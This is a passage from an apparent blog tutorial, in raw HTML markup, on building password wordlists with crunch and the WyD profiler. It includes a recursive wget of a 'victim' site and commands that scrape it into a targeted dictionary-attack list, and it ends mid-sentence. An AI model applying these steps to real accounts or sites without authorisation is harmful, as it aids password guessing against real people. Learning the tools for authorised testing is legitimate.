&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: only works if -o START is used and the output files will be in the format of starting letter-ending letter for example: ./crunch 4 5 -b 20mib -o START will generate 4 files: aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-c &amp;lt;number&amp;gt; = Is similar to -b above but breaks the files based on the number of lines to write to the output file. 
It also requires -o START to be used&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: The output files will be in the format of starting letter-ending letter, for example: ./crunch 1 1 -f /pentest/password/crunch/charset.lst mixalpha-numeric-all-space -o START -c 60 will result in 2 files: a-7.txt and 8-\ .txt The reason for the slash in the second filename is that the ending character is a space and ls has to escape it to print it (so yes, you will need to put in the \ when specifying the filename because the last character is a space)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-f &amp;lt;/path/to/charset.lst&amp;gt; &amp;lt;charset-name&amp;gt; = Allows you to specify a character set from the charset.lst &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: 
&amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-i = Inverts the output so instead of aab,aac,aad you get baa,caa,daa &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-o &amp;lt;wordlist.txt&amp;gt; = defines the file to write output to &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-p &amp;lt;charset&amp;gt; OR -p &amp;lt;word1 word2...&amp;gt; = This tells the tool to not generate words that have repeating characters and produces a much smaller wordlist, generally only helpful if you know the password policy doesn't allow this&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-q &amp;lt;filename.txt&amp;gt; = tells the tool to read from filename.txt and perform permutations based on what is read from the file. This cannot be used with the -s or -t arguments below&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: it also ignores the min and max length arguments, despite the fact that they must still be included as part of the syntax to run properly&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-r = this tells the tool to resume where it left off, although you have to make sure you restart it with the exact same command that was last used, with the addition of -r at the end (does not work with -s in the original command, so just remove it when resuming)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: 
Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-s &amp;lt;startblock&amp;gt; = this defines the string to start running crunch on &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-t &amp;lt;@*%^&amp;gt; = this is helpful for someone who may have been shoulder surfing and knows some of the characters but not all, as this argument allows you to specify a pattern and define positions to replace (and how to replace), for example: &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-t *^ssw@rd%&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; 
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;__ssw_rd_ = the fixed letters&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;@ will insert lower aplha (a-z)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;* will insert upper alpha (A-Z)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;% will insert numbers (0-9)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 85.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: 
Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;^ will insert symbols (!@#$%^&amp;amp;*)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 117pt; mso-add-space: auto; mso-list: l0 level4 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Eventually this would work the word P@ssword1 into our final output which would help us find the password needed for this example&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 49.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;-z &amp;lt;gzip|bzip2|lzma&amp;gt; = This will tell crunch to compresses the output from the -o option using the chosen method (gzip/bzip2/lzma). &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;EXAMPLE: ./crunch 4 4 abc123 -b 1mb -o START&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Generates all possibilities of 4 characters in length (min is set to 4 and max as well) &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt; text-indent: 0.5in;"&gt;&lt;span style="font-family: Calibri;"&gt;using the charset of abc123, with defined output file size of not to exceed 1mb&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;EXAMPLE: ./crunch 1 4 abc123 -b 1mb -o START&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Generates all possibilities from 1 to 4 characters in length (min is set to 1 and max&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; is set to 4) using the charset of abc123, output files not to exceed 1mb&lt;/span&gt;&lt;/div&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;, &amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-language: AR-SA; 
mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;, &amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-qw730ERe_zo/Tfw4eqa8NbI/AAAAAAAAAAM/layA4LcC5FI/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" i$="true" src="http://3.bp.blogspot.com/-qw730ERe_zo/Tfw4eqa8NbI/AAAAAAAAAAM/layA4LcC5FI/s400/1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;, &amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;NOTE: You can use a quick "cat filename.txt" to check what words are created and inserted into the file, or "wc -l &amp;lt;filename.txt&amp;gt;" to list the word count. If you look at the above shots you can see how you can split the file output based on size, which is impacted by the length designated and char set used. You should be able to figure it out from here.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;======================================================================&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;+++++++++++++(TUT) Who's Your Daddy Password Profiler (WYD)++++++++++++++++&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;======================================================================&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;OK, so that covers CRUNCH and how we use it to create a raw wordlist with every possibility, but this may take a while to attack with...so how can we increase our chances for dictionary attack? We can use the Who's Your Daddy password profiling tool, a.k.a. WyD, to aid us in creating a much narrower wordlist more targeted at the individuals or members of our target site. It and the next tool CUPP are brought to us by the great folks over at Social Engineer [dot] Org. The Who's Your Daddy Password Profiler is a great tool to have in your arsenal, as it can be used to scrape information from web content and the files found on websites to extract usable information that can be used in creating more effective wordlists for dictionary attacks. 
You can download it from the SE site, found here: &lt;a href="http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Who%27s_Your_Daddy_Password_Profiler_(WYD)"&gt;http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Who%27s_Your_Daddy_Password_Profiler_(WYD)&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;The file types it can scrape words from are: plain text, html, php (partially, treated as html), doc, pdf, mp3, ppt, jpeg and odt/ods/odp; anything unknown with MIME type text/plain is run through strings.&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;As usual you will need to download and extract the files to get started, like so:&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: tar -xvf wyd-0.2.tar.tar&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: cd wyd-0.2/&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;To start WyD and see the options available, simply type:&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: perl wyd.pl&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-mhx5QfwSTt8/Tfw4_JzkY9I/AAAAAAAAAAQ/kIdGoeTLQBg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" i$="true" src="http://2.bp.blogspot.com/-mhx5QfwSTt8/Tfw4_JzkY9I/AAAAAAAAAAQ/kIdGoeTLQBg/s400/2.png" width="378" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;You may be asking: OK, but how do I actually use this thing? Don't worry, I will show you. We need the common Linux tool wget to retrieve the victim's website. It is installed by default in almost all Linux distros, so you should not have any problems, and it has far more options than I can go into here, so research it on the side. 
For now just follow these steps to make a new folder, move into it, and recursively download the web content from the target site, like this:&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: mkdir victim-site&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: cd victim-site/&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: wget -r http://www.victim-site.com&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-cmOqqVcnnIY/Tfw5Om4fAGI/AAAAAAAAAAU/EnDhaTqSrVg/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" i$="true" src="http://4.bp.blogspot.com/-cmOqqVcnnIY/Tfw5Om4fAGI/AAAAAAAAAAU/EnDhaTqSrVg/s400/3.png" width="378" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;wget will take a while to fetch everything, but once it is done the results are in the victim-site/ folder you ran it from. A recursive fetch requests every page it can find, so only point it at a site you are authorized to test; -l &amp;lt;depth&amp;gt; limits how deep it follows links and -w &amp;lt;seconds&amp;gt; paces the requests. By default it stays on the one host and obeys robots.txt, so parts of a site can be skipped. 
Now, to create a custom wordlist with WyD, use the following command:&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;EXAMPLE: perl wyd.pl -o /path/to/output/file -t -b -e &amp;lt;file OR /path/to/victim-site/&amp;gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND:&amp;nbsp;perl wyd.pl -o victim-wordlist.txt -t -b -e /home/SkyWalker/victim-site/&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;Breakdown of the above, which I commonly use when running this:&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 31.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;-o /path/to/output/file = tells it to send everything to file instead of printing to the screen via STDOUT. This file will become our potential wordlist (or wordlists if the -t argument is also used).&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 31.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;-t = this will tell it to create separate files based on each file type find that the tool uses to extract data from for profiling. 
This can only be used with the "-o" option referenced above, and will create as many output files as types found/used.&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;&lt;span style="mso-tab-count: 1;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 58.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;NOTE/EXAMPLE: file is 'victim.txt' and there are words found in PDF, plain-text, JPEG and HTML files, you will find the following output files if used: 'victim.txt.pdf', 'victim.txt.jpeg', 'victim.txt.plain' and 'victim.txt.html'.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 58.5pt; mso-add-space: auto; mso-list: l0 level3 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: Wingdings; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"&gt;&lt;span style="mso-list: Ignore;"&gt;§&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;-b = this will tell the tool to disable the removal of non-alpha characters from the start of a word, which can be helpful sometimes as the default behavior of WyD is to remove them.&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 31.5pt; mso-add-space: auto; mso-list: l0 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;-e = this will tell the tool 
